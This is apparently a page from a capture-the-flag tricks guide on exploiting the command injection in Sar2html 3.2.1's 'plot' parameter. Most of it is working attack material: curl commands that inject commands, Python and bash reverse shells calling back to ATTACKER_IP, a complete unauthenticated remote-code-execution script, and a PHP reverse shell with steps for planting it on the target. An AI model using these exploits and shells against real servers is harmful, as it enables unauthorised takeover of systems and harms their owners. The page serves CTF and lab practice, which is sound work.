> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/web-exploit/initial-access-web-exploit-sar2html.md).

# Sar2Html

## Sar2html 3.2.1 Remote Code Execution

Sar2html version 3.2.1 contains a command injection vulnerability in the `plot` parameter. By appending shell metacharacters, such as a semicolon (`;`), to the `plot` value, you can execute arbitrary commands on the server. This is commonly used to establish a reverse shell back to your machine. The exact path to `index.php` might vary depending on the installation.

You can test the vulnerability with a simple command like `id`:

```bash
curl "http://TARGET_IP/sar2html/index.php?plot=;id"
```

To establish a reverse shell using Python via `curl`:

```bash
curl "http://TARGET_IP/joomla/_test/index.php?plot=;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKER_IP%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/sh%22)%27"
```

Alternatively, a bash reverse shell can be initiated using `curl`:

```bash
curl "http://TARGET_IP/sar2html/index.php?plot=;bash%20-c%20%27bash%20-i%20%3E&%20/dev/tcp/ATTACKER_IP/4444%200%3E&1%27"
```

Replace `TARGET_IP` with the vulnerable machine's IP address and `ATTACKER_IP` with the IP address your listener is running on. Ensure you have a netcat or similar listener active on the specified port (e.g., 4444) before executing the `curl` command.

For a more automated approach to exploiting the sar2HTML 3.2.1 Remote Code Execution (RCE) vulnerability, an unauthenticated Python script can be used. This script leverages the vulnerability in the `plot` parameter to execute arbitrary commands.

```python
#!/usr/bin/python3
# Exploit Title: sar2HTML 3.2.1 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-01-07
# Exploit Author: Jsmoreira02
# Version: 3.2.1

import requests
import sys
import os
import urllib.parse

def usage():
    print("Usage: python3 exploit.py <URL> <CMD>")
    print("Example: python3 exploit.py http://192.168.1.100 \"ls -l\"")
    print("Example: python3 exploit.py http://192.168.1.100 \"bash -c 'bash -i >& /dev/tcp/192.168.1.110/4444 0>&1'\"")
    sys.exit(0)

def exploit(url, cmd):
    payload = f";{cmd}"
    encoded_payload = urllib.parse.quote(payload)
    exploit_url = f"{url}/index.php?plot={encoded_payload}"
    print(f"[*] Sending payload: {exploit_url}")
    try:
        response = requests.get(exploit_url)
        if response.status_code == 200:
            print("[+] Command executed successfully.")
            print("--- Response ---")
            print(response.text)
            print("----------------")
        else:
            print(f"[-] Received status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to {url}: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        usage()
    url = sys.argv[1]
    cmd = sys.argv[2]
    exploit(url, cmd)
```

This script takes the target URL and the command to execute as arguments. It constructs the malicious URL by encoding the command prefixed with a semicolon and sends a GET request using the `requests` library.

As an alternative payload for establishing a reverse shell via command injection, a PHP script can be used. This script typically connects back to a listener on the attacker machine and pipes the standard input, output, and error streams to the socket, allowing for interactive command execution.

```php
<?php
set_time_limit(0);
$ip = 'ATTACKER_IP';  // Change this
$port = 1234;         // Change this

if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
    die("socket_create() failed: reason: " . socket_strerror(socket_last_error()) . "\n");
}

if (socket_connect($sock, $ip, $port) === false) {
    die("socket_connect() failed: reason: " . socket_strerror(socket_last_error()) . "\n");
}

function read_all($sock) {
    $bytes = '';
    while ($byte = socket_read($sock, 1)) {
        $bytes .= $byte;
        if ($byte === "\n") break;
    }
    return $bytes;
}

while ($bytes = read_all($sock)) {
    $bytes = trim($bytes);
    if (empty($bytes)) continue;
    $cmd = proc_open($bytes . ' 2>&1', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
    if (!is_resource($cmd)) break;
    proc_close($cmd);
}
socket_close($sock);
?>
```

Save this script (e.g., as `shell.php`), modify the `$ip` and `$port` variables to match your listener, and then use the command injection to execute it on the target system. This often involves using utilities like `wget` or `curl` via the injection to download the script to a writable directory on the target, followed by executing it using the PHP interpreter via the command injection.
